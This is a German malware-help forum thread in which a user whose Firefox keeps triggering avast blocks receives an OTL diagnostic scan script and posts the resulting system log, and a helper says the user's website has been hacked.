Trojaner-Board - avast! hat den Zugriff auf eine infizierte Webseite blockiert

Trojaner-Board (https://www.trojaner-board.de/)

- Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)

- - avast! hat den Zugriff auf eine infizierte Webseite blockiert (https://www.trojaner-board.de/123943-avast-hat-zugriff-infizierte-webseite-blockiert.html)

avast! hat den Zugriff auf eine infizierte Webseite blockiert

Hallo,

ich nutze Windows XP, und seit kurzem meldet mir Avast oder malwarebytes, dass eine ausgehender Versuch von firefox.exe auf eine bösartige Seite geblockt wurde. Bei den Scan sind keine Viren, Trojaner sichtbar.

Ich nutze Firefox und habe den Java Plugin deaktiviert (vermutlich zu spät). Sollte ich Java komlett deinstallieren ?

Hoffe ihr habt einen Tip

Zusatz: Ich habe ein Onlineprojekt : www.ratenkauf-24.de Wenn ich die Seite öffne erscheint unmittelbar die Fehlermeldung. Liegt das Problem an der Seite ?

hi
nicht nur java muss aktuell gehalten werden,es gibt da noch einige andere plugins :-)
mal den pc ansehen:
Falls noch nicht vorhanden, lade Dir bitte OTL von Oldtimer herunter und speichere es auf Deinem Desktop

Starte bitte die
OTL.exe
.
Vista und Win7 User mit Rechtsklick "als Administrator starten"
Kopiere nun den Inhalt in die http://larusso.trojaner-board.de/Images/otlfix.jpg
Textbox.

Code:

activex

netsvcs

msconfig

%SYSTEMDRIVE%\*.

%PROGRAMFILES%\*.exe

%LOCALAPPDATA%\*.exe

%systemroot%\*. /mp /s

C:\Windows\system32\*.tsp

/md5start

userinit.exe

eventlog.dll

scecli.dll

netlogon.dll

cngaudit.dll

ws2ifsl.sys

sceclt.dll

ntelogon.dll

winlogon.exe

logevent.dll

user32.DLL

explorer.exe

iaStor.sys

nvstor.sys

atapi.sys

IdeChnDr.sys

viasraid.sys

AGP440.sys

vaxscsi.sys

nvatabus.sys

viamraid.sys

nvata.sys

nvgts.sys

iastorv.sys

ViPrt.sys

eNetHook.dll

ahcix86.sys

KR10N.sys

nvstor32.sys

ahcix86s.sys

/md5stop

%systemroot%\system32\drivers\*.sys /lockedfiles

%systemroot%\System32\config\*.sav

%systemroot%\system32\*.dll /lockedfiles

%USERPROFILE%\*.*

%USERPROFILE%\Local Settings\Temp\*.exe

%USERPROFILE%\Local Settings\Temp\*.dll

%USERPROFILE%\Application Data\*.exe

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems|Windows /rs

CREATERESTOREPOINT

Schliesse bitte nun alle Programme. (Wichtig)
Klicke nun bitte auf den Quick Scan Button.
Kopiere
nun den Inhalt aus OTL.txt und Extra.txt hier in Deinen Thread

und deine seite ist gehackt worden, nimm die mal ofline und spiele ein backup ein.

Hi Markus,

erstmals Danke. Wie konntest du sehen, dass die Seite gehackt ist. Gibt es dafür ein Tool ?
Diese Seite wurde mal von Google webmastertools als korrumpierte Steie eingestuft, da hab ich ein Backup eingespielt und Passwörter geändert. Danach kam von Google keine fehlermeldung mehr. Würde gerne wissen wie du das überprüft hast. Ich habe auch die Datenback als backup, nun befürchte ich, dass die schon korrumpiert sind. Wie kann ich die Datenbank nach Viren, Trojanern etc. prüfen.

Hier deine gefoderten txt-dateien. Alle Programme waren aus, bis auf Avast Virenscanner (im Hintergrund)

otl.txt
OTL Logfile:

Code:

OTL logfile created on: 12.09.2012 15:31:26 - Run 1

OTL by OldTimer - Version 3.2.61.3     Folder = C:\Dokumente und Einstellungen\Admin\Desktop\arge

Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation

Internet Explorer (Version = 8.0.6001.18702)

Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy

 

1,99 Gb Total Physical Memory | 1,50 Gb Available Physical Memory | 75,31% Memory free

3,84 Gb Paging File | 3,49 Gb Available in Paging File | 90,91% Paging File free

Paging file location(s): C:\pagefile.sys 2046 4092 [binary data]

 

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Programme

Drive C: | 127,99 Gb Total Space | 113,83 Gb Free Space | 88,94% Space Free | Partition Type: NTFS

Drive D: | 104,89 Gb Total Space | 104,60 Gb Free Space | 99,72% Space Free | Partition Type: NTFS

 

Computer Name: BLA-3443EB72419 | User Name: Admin | Logged in as Administrator.

Boot Mode: Normal | Scan Mode: Current user | Quick Scan

Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days

 
 ========== Processes (SafeList) ==========

 

PRC - [2012.09.12 15:20:26 | 000,600,064 | ---- | M] (OldTimer Tools) -- C:\Dokumente und Einstellungen\Admin\Desktop\arge\OTL.exe

PRC - [2012.09.07 17:04:46 | 000,399,432 | ---- | M] (Malwarebytes Corporation) -- C:\Programme\Malwarebytes' Anti-Malware\mbamscheduler.exe

PRC - [2012.08.21 11:12:26 | 004,282,728 | ---- | M] (AVAST Software) -- C:\Programme\AVAST Software\Avast\AvastUI.exe

PRC - [2012.08.21 11:12:25 | 000,044,808 | ---- | M] (AVAST Software) -- C:\Programme\AVAST Software\Avast\AvastSvc.exe

PRC - [2012.08.20 22:21:47 | 000,218,624 | ---- | M] () -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Mobile Partner\OnlineUpdate\ouc.exe

PRC - [2012.08.13 13:33:30 | 003,064,000 | ---- | M] (Skype Technologies S.A.) -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Skype\Toolbars\Skype C2C Service\c2c_service.exe

PRC - [2012.07.14 15:59:32 | 000,497,320 | ---- | M] (Check Point Software Technologies) -- C:\Programme\CheckPoint\ZAForceField\ISWSVC.exe

PRC - [2012.07.11 20:54:49 | 000,116,608 | ---- | M] (SUPERAntiSpyware.com) -- C:\Programme\SUPERAntiSpyware\SASCore.exe

PRC - [2012.05.29 13:09:52 | 001,528,672 | ---- | M] (TuneUp Software) -- C:\Programme\TuneUp Utilities 2012\TuneUpUtilitiesService32.exe

PRC - [2012.05.29 13:09:52 | 001,220,960 | ---- | M] (TuneUp Software) -- C:\Programme\TuneUp Utilities 2012\TuneUpUtilitiesApp32.exe

PRC - [2010.11.16 15:37:38 | 000,264,704 | ---- | M] () -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\DatacardService\HWDeviceService.exe

PRC - [2008.04.14 04:22:45 | 001,036,800 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\explorer.exe

PRC - [2004.08.04 14:00:00 | 000,047,104 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\drwtsn32.exe

 

 
 ========== Modules (No Company Name) ==========

 

MOD - [2012.09.12 09:49:17 | 001,809,408 | ---- | M] () -- C:\Programme\AVAST Software\Avast\defs\12091200\algo.dll

MOD - [2012.09.11 20:43:54 | 001,808,384 | ---- | M] () -- C:\Programme\AVAST Software\Avast\defs\12091101\algo.dll

MOD - [2012.08.20 22:21:50 | 002,415,104 | ---- | M] () -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Mobile Partner\OnlineUpdate\QtCore4.dll

MOD - [2012.08.20 22:21:50 | 001,148,416 | ---- | M] () -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Mobile Partner\OnlineUpdate\QtNetwork4.dll

MOD - [2012.08.20 22:21:49 | 000,011,362 | ---- | M] () -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Mobile Partner\OnlineUpdate\mingwm10.dll

MOD - [2012.08.20 22:21:48 | 000,043,008 | ---- | M] () -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Mobile Partner\OnlineUpdate\libgcc_s_dw2-1.dll

MOD - [2012.08.20 22:21:47 | 000,218,624 | ---- | M] () -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Mobile Partner\OnlineUpdate\ouc.exe

MOD - [2012.01.03 15:10:46 | 000,301,056 | ---- | M] () -- C:\Programme\Gemeinsame Dateien\Adobe\Acrobat\ActiveX\PDFShell.DEU

MOD - [2010.11.16 15:37:38 | 000,264,704 | ---- | M] () -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\DatacardService\HWDeviceService.exe

MOD - [2008.07.15 08:13:20 | 000,856,064 | ---- | M] () -- C:\Programme\Lenovo Fingerprint Software\SharedResources.dll

MOD - [2006.10.12 17:28:48 | 000,757,760 | ---- | M] () -- C:\WINDOWS\system32\bcm1xsup.dll

 

 
 ========== Services (SafeList) ==========

 

SRV - File not found [Disabled | Unknown] -- C:\Programme\AVAST Software\Avast\afwServ.exe -- (avast! Firewall)

SRV - [2012.09.07 17:04:46 | 000,676,936 | ---- | M] (Malwarebytes Corporation) [Auto | Stopped] -- C:\Programme\Malwarebytes' Anti-Malware\mbamservice.exe -- (MBAMService)

SRV - [2012.09.07 17:04:46 | 000,399,432 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- C:\Programme\Malwarebytes' Anti-Malware\mbamscheduler.exe -- (MBAMScheduler)

SRV - [2012.08.29 13:05:02 | 000,250,568 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)

SRV - [2012.08.21 11:12:25 | 000,044,808 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Programme\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus)

SRV - [2012.08.20 22:21:47 | 000,218,624 | ---- | M] () [Auto | Stopped] -- C:\Programme\Mobile Partner\UpdateDog\ouc.exe -- (Mobile Partner. RunOuc)

SRV - [2012.08.13 13:33:30 | 003,064,000 | ---- | M] (Skype Technologies S.A.) [Auto | Running] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Skype\Toolbars\Skype C2C Service\c2c_service.exe -- (Skype C2C Service)

SRV - [2012.08.03 12:37:56 | 002,445,880 | ---- | M] (Check Point Software Technologies LTD) [Auto | Stopped] -- C:\Programme\CheckPoint\ZoneAlarm\vsmon.exe -- (vsmon)

SRV - [2012.07.14 15:59:32 | 000,497,320 | ---- | M] (Check Point Software Technologies) [Auto | Running] -- C:\Programme\CheckPoint\ZAForceField\ISWSVC.exe -- (IswSvc)

SRV - [2012.07.13 13:28:36 | 000,160,944 | R--- | M] (Skype Technologies) [Disabled | Stopped] -- C:\Programme\Skype\Updater\Updater.exe -- (SkypeUpdate)

SRV - [2012.07.11 20:54:49 | 000,116,608 | ---- | M] (SUPERAntiSpyware.com) [Auto | Running] -- C:\Programme\SUPERAntiSpyware\SASCore.exe -- (!SASCORE)

SRV - [2012.05.29 13:09:52 | 001,528,672 | ---- | M] (TuneUp Software) [Auto | Running] -- C:\Programme\TuneUp Utilities 2012\TuneUpUtilitiesService32.exe -- (TuneUp.UtilitiesSvc)

SRV - [2012.05.29 13:09:50 | 000,029,024 | ---- | M] (TuneUp Software) [Auto | Running] -- C:\WINDOWS\system32\uxtuneup.dll -- (UxTuneUp)

SRV - [2012.04.03 09:26:12 | 000,161,664 | ---- | M] (Oracle Corporation) [Disabled | Stopped] -- C:\Programme\Java\jre7\bin\jqs.exe -- (JavaQuickStarterService)

SRV - [2010.11.16 15:37:38 | 000,264,704 | ---- | M] () [Auto | Running] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\DatacardService\HWDeviceService.exe -- (HWDeviceService.exe)

SRV - [2008.07.15 08:13:28 | 000,106,496 | ---- | M] (AuthenTec,Inc) [Disabled | Stopped] -- C:\WINDOWS\system32\FpLogonServ.exe -- (FingerprintServer)

SRV - [2007.03.16 06:26:22 | 000,057,344 | ---- | M] (Lenovo) [Disabled | Stopped] -- C:\Programme\Lenovo\PM Driver\PMSveH.exe -- (PMSveH)

SRV - [2006.11.11 22:56:18 | 000,266,295 | ---- | M] (Broadcom Corporation.) [Disabled | Stopped] -- C:\Programme\Lenovo\Bluetooth Software\bin\btwdins.exe -- (btwdins)

SRV - [2006.10.26 20:49:34 | 000,441,136 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Programme\Gemeinsame Dateien\Microsoft Shared\OFFICE12\ODSERV.EXE -- (odserv)

SRV - [2006.10.26 15:03:08 | 000,145,184 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Programme\Gemeinsame Dateien\Microsoft Shared\Source Engine\OSE.EXE -- (ose)

SRV - [2006.08.31 18:04:06 | 000,065,536 | ---- | M] (Broadcom Corp.) [Disabled | Stopped] -- C:\Programme\Broadcom\BACS\BPowMon.exe -- (BPowMon)

 

 
 ========== Driver Services (SafeList) ==========

 

DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\ZTEusbser6k.sys -- (ZTEusbser6k)

DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\ZTEusbnmea.sys -- (ZTEusbnmea)

DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\ZTEusbmdm6k.sys -- (ZTEusbmdm6k)

DRV - File not found [Kernel | On_Demand | Stopped] --  -- (WDICA)

DRV - File not found [Kernel | On_Demand | Stopped] --  -- (PDRFRAME)

DRV - File not found [Kernel | On_Demand | Stopped] --  -- (PDRELI)

DRV - File not found [Kernel | On_Demand | Stopped] --  -- (PDFRAME)

DRV - File not found [Kernel | On_Demand | Stopped] --  -- (PDCOMP)

DRV - File not found [Kernel | System | Stopped] --  -- (PCIDump)

DRV - File not found [Kernel | On_Demand | Stopped] -- system32\drivers\massfilter.sys -- (massfilter)

DRV - File not found [Kernel | System | Stopped] --  -- (lbrtfdc)

DRV - File not found [Kernel | System | Stopped] --  -- (i2omgmt)

DRV - File not found [Kernel | System | Stopped] --  -- (Changer)

DRV - [2012.09.12 10:51:31 | 000,040,776 | ---- | M] (Malwarebytes Corporation) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\mbamswissarmy.sys -- (MBAMSwissArmy)

DRV - [2012.09.07 17:04:46 | 000,022,856 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\mbam.sys -- (MBAMProtector)

DRV - [2012.08.21 11:13:15 | 000,729,752 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\WINDOWS\System32\drivers\aswSnx.sys -- (aswSnx)

DRV - [2012.08.21 11:13:15 | 000,355,632 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aswSP.sys -- (aswSP)

DRV - [2012.08.21 11:13:15 | 000,054,232 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aswTdi.sys -- (aswTdi)

DRV - [2012.08.21 11:13:14 | 000,097,608 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\WINDOWS\System32\drivers\aswmon2.sys -- (aswMon2)

DRV - [2012.08.21 11:13:14 | 000,035,928 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aswRdr.sys -- (AswRdr)

DRV - [2012.08.21 11:13:13 | 000,025,256 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aavmker4.sys -- (Aavmker4)

DRV - [2012.08.21 11:13:13 | 000,021,256 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\WINDOWS\System32\drivers\aswFsBlk.sys -- (aswFsBlk)

DRV - [2012.08.20 22:21:51 | 000,117,504 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\ewusbnet.sys -- (ewusbnet)

DRV - [2012.08.20 22:21:51 | 000,106,496 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\ewusbmdm.sys -- (hwdatacard)

DRV - [2012.08.20 22:21:51 | 000,102,784 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\ew_hwusbdev.sys -- (ew_hwusbdev)

DRV - [2012.08.20 22:21:51 | 000,072,576 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\ew_jubusenum.sys -- (huawei_enumerator)

DRV - [2012.08.03 12:08:02 | 000,526,640 | ---- | M] (Check Point Software Technologies LTD) [Kernel | System | Running] -- C:\WINDOWS\system32\vsdatant.sys -- (Vsdatant)

DRV - [2012.07.14 15:59:44 | 000,027,056 | ---- | M] (Check Point Software Technologies) [Kernel | Auto | Running] -- C:\Programme\CheckPoint\ZAForceField\ISWKL.sys -- (ISWKL)

DRV - [2012.03.07 02:02:43 | 000,024,408 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aswKbd.sys -- (aswKbd)

DRV - [2012.02.09 11:48:24 | 000,010,064 | ---- | M] (TuneUp Software) [Kernel | On_Demand | Running] -- C:\Programme\TuneUp Utilities 2012\TuneUpUtilitiesDriver32.sys -- (TuneUpUtilitiesDrv)

DRV - [2011.07.22 18:27:02 | 000,012,880 | ---- | M] (SUPERAdBlocker.com and SUPERAntiSpyware.com) [Kernel | System | Running] -- C:\Programme\SUPERAntiSpyware\sasdifsv.sys -- (SASDIFSV)

DRV - [2011.07.12 23:55:22 | 000,067,664 | ---- | M] (SUPERAdBlocker.com and SUPERAntiSpyware.com) [Kernel | System | Running] -- C:\Programme\SUPERAntiSpyware\SASKUTIL.SYS -- (SASKUTIL)

DRV - [2008.06.05 21:21:52 | 000,146,944 | R--- | M] (AuthenTec, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\atswpdrv.sys -- (ATSWPDRV)

DRV - [2008.05.12 19:04:04 | 000,013,480 | ---- | M] (Lenovo Group Limited) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\smiif32.sys -- (lenovo.smi)

DRV - [2007.02.24 15:42:22 | 000,039,936 | ---- | M] (REDC) [Kernel | Auto | Running] -- C:\WINDOWS\system32\drivers\rimmptsk.sys -- (rimmptsk)

DRV - [2007.02.16 16:46:42 | 000,160,256 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\b57xp32.sys -- (b57w2k)

DRV - [2007.01.30 19:57:00 | 004,474,368 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\RtkHDAud.sys -- (IntcAzAudAddService)

DRV - [2007.01.23 18:03:28 | 000,037,376 | ---- | M] (REDC) [Kernel | Auto | Running] -- C:\WINDOWS\system32\drivers\rixdptsk.sys -- (rismxdp)

DRV - [2007.01.23 17:40:20 | 000,042,496 | ---- | M] (REDC) [Kernel | Auto | Running] -- C:\WINDOWS\system32\drivers\rimsptsk.sys -- (rimsptsk)

DRV - [2006.11.13 11:41:20 | 000,862,922 | ---- | M] (Broadcom Corporation.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\btkrnl.sys -- (BTKRNL)

DRV - [2006.11.08 14:49:42 | 000,012,544 | ---- | M] (Intel Corporation) [Kernel | Auto | Running] -- C:\WINDOWS\system32\drivers\s24trans.sys -- (s24trans)

DRV - [2006.10.30 11:51:40 | 000,067,672 | ---- | M] (Broadcom Corporation.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\btwusb.sys -- (BTWUSB)

DRV - [2006.08.30 15:53:00 | 001,161,152 | ---- | M] (Agere Systems) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\AGRSM.sys -- (AgereSoftModem)

DRV - [2006.05.24 12:48:14 | 000,010,240 | ---- | M] (Lenovo ) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\PMHler.sys -- (PMHler)

DRV - [2005.06.10 06:55:28 | 000,173,056 | ---- | M] (Funk Software, Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\odysseyIM4.sys -- (odysseyIM4)

DRV - [2003.04.24 16:21:50 | 000,006,025 | ---- | M] (Broadcom Corporation) [Kernel | Auto | Running] -- C:\Programme\Broadcom\BACS\BASFND.sys -- (BASFND)

 

 
 ========== Standard Registry (SafeList) ==========

 

 
 ========== Internet Explorer ==========

 

IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}

 

IE - HKCU\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://search.live.com/results.aspx?q={searchTerms}&src=IE-SearchBox&Form=IE8SRC

IE - HKCU\..\SearchScopes\{afdbddaa-5d3f-42ee-b79c-185a7020515b}: "URL" = hxxp://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT2613550

IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

 

 
 ========== FireFox ==========

 

FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\system32\Macromed\Flash\NPSWF32_11_4_402_265.dll ()

FF - HKLM\Software\MozillaPlugins\@checkpoint.com/FFApi: C:\Programme\CheckPoint\ZAForceField\TrustChecker\bin\npFFApi.dll ()

FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.3.1: C:\WINDOWS\system32\npDeployJava1.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.3.1: C:\Programme\Oracle\JavaFX 2.0 Runtime\bin\plugin2\npjp2.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.0.1: C:\Programme\VideoLAN\VLC\npvlc.dll (VideoLAN)

FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Programme\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

 

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{FFB96CC1-7EB3-449D-B827-DB661701C6BB}: C:\Programme\CheckPoint\ZAForceField\TrustChecker [2012.08.22 13:51:05 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\wrc@avast.com: C:\Programme\AVAST Software\Avast\WebRep\FF [2012.08.22 14:00:35 | 000,000,000 | ---D | M]

 

[2012.09.12 10:50:47 | 000,000,000 | ---D | M] (No name found) -- C:\Dokumente und Einstellungen\Admin\Anwendungsdaten\Mozilla\Extensions

 

O1 HOSTS File: ([2012.03.30 13:26:52 | 000,441,496 | R--- | M]) - C:\WINDOWS\system32\drivers\etc\hosts

O1 - Hosts: 127.0.0.1       localhost

O1 - Hosts: 127.0.0.1        www.007guard.com

O1 - Hosts: 127.0.0.1        007guard.com

O1 - Hosts: 127.0.0.1        008i.com

O1 - Hosts: 127.0.0.1        www.008k.com

O1 - Hosts: 127.0.0.1        008k.com

O1 - Hosts: 127.0.0.1        www.00hq.com

O1 - Hosts: 127.0.0.1        00hq.com

O1 - Hosts: 127.0.0.1        010402.com

O1 - Hosts: 127.0.0.1        www.032439.com

O1 - Hosts: 127.0.0.1        032439.com

O1 - Hosts: 127.0.0.1        www.0scan.com

O1 - Hosts: 127.0.0.1        0scan.com

O1 - Hosts: 127.0.0.1        www.1000gratisproben.com

O1 - Hosts: 127.0.0.1        1000gratisproben.com

O1 - Hosts: 127.0.0.1        1001namen.com

O1 - Hosts: 127.0.0.1        www.1001namen.com

O1 - Hosts: 127.0.0.1        100888290cs.com

O1 - Hosts: 127.0.0.1        www.100888290cs.com

O1 - Hosts: 127.0.0.1        www.100sexlinks.com

O1 - Hosts: 127.0.0.1        100sexlinks.com

O1 - Hosts: 127.0.0.1        www.10sek.com

O1 - Hosts: 127.0.0.1        10sek.com

O1 - Hosts: 127.0.0.1        www.1-2005-search.com

O1 - Hosts: 127.0.0.1        1-2005-search.com

O1 - Hosts: 15174 more lines...

O2 - BHO: (Adobe PDF Link Helper) - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Programme\Gemeinsame Dateien\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)

O2 - BHO: (ZoneAlarm Security Engine Registrar) - {8A4A36C2-0535-4D2C-BD3D-496CB7EED6E3} - C:\Programme\CheckPoint\ZAForceField\Trustchecker\bin\TrustCheckerIEPlugin.dll (Check Point Software Technologies)

O2 - BHO: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Programme\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)

O2 - BHO: (Skype Browser Helper) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Programme\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)

O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programme\Oracle\JavaFX 2.0 Runtime\bin\jp2ssv.dll (Oracle Corporation)

O3 - HKLM\..\Toolbar: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Programme\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)

O3 - HKLM\..\Toolbar: (ZoneAlarm Security Engine) - {EE2AC4E5-B0B0-4EC6-88A9-BCA1A32AB107} - C:\Programme\CheckPoint\ZAForceField\Trustchecker\bin\TrustCheckerIEPlugin.dll (Check Point Software Technologies)

O3 - HKCU\..\Toolbar\WebBrowser: (ZoneAlarm Security Engine) - {EE2AC4E5-B0B0-4EC6-88A9-BCA1A32AB107} - C:\Programme\CheckPoint\ZAForceField\Trustchecker\bin\TrustCheckerIEPlugin.dll (Check Point Software Technologies)

O4 - HKLM..\Run: []  File not found

O4 - HKLM..\Run: [Alcmtr] C:\WINDOWS\Alcmtr.exe (Realtek Semiconductor Corp.)

O4 - HKLM..\Run: [avast] C:\Programme\AVAST Software\Avast\avastUI.exe (AVAST Software)

O4 - HKLM..\Run: [AzMixerSel] C:\Programme\Realtek\InstallShield\AzMixerSel.exe (Realtek Semiconductor Corp.)

O4 - HKLM..\Run: [FingerPrintSoftware] C:\Programme\Lenovo Fingerprint Software\fpapp.exe (Authentec,Inc)

O4 - HKLM..\Run: [ISW]  File not found

O4 - HKLM..\Run: [PMHandler] C:\Programme\Lenovo\PM Driver\PMHandler.exe (Lenovo)

O4 - HKLM..\Run: [ZoneAlarm] C:\Programme\CheckPoint\ZoneAlarm\zatray.exe (Check Point Software Technologies LTD)

O4 - HKCU..\Run: [SUPERAntiSpyware] C:\Programme\SUPERAntiSpyware\SUPERAntiSpyware.exe (SUPERAntiSpyware.com)

O4 - Startup: C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\BTTray.lnk = C:\Programme\Lenovo\Bluetooth Software\BTTray.exe (Broadcom Corporation.)

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: HonorAutoRunSetting = 1

O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145

O8 - Extra context menu item: Senden an &Bluetooth-Gerät... - C:\Programme\Lenovo\Bluetooth Software\btsendto_ie_ctx.htm ()

O9 - Extra Button: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Programme\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)

O9 - Extra Button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programme\Lenovo\Bluetooth Software\btsendto_ie.htm ()

O9 - Extra 'Tools' menuitem : @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programme\Lenovo\Bluetooth Software\btsendto_ie.htm ()

O9 - Extra Button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe File not found

O9 - Extra 'Tools' menuitem : Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe File not found

O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab (Java Plug-in 1.7.0_03)

O16 - DPF: {CAFEEFAC-0017-0000-0003-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab (Java Plug-in 1.7.0_03)

O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab (Java Plug-in 1.7.0_03)

O18 - Protocol\Handler\ipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)

O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)

O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)

O18 - Protocol\Handler\ms-help {314111c7-a502-11d2-bbca-00c04f8ec294} - C:\Programme\Gemeinsame Dateien\Microsoft Shared\Help\hxds.dll (Microsoft Corporation)

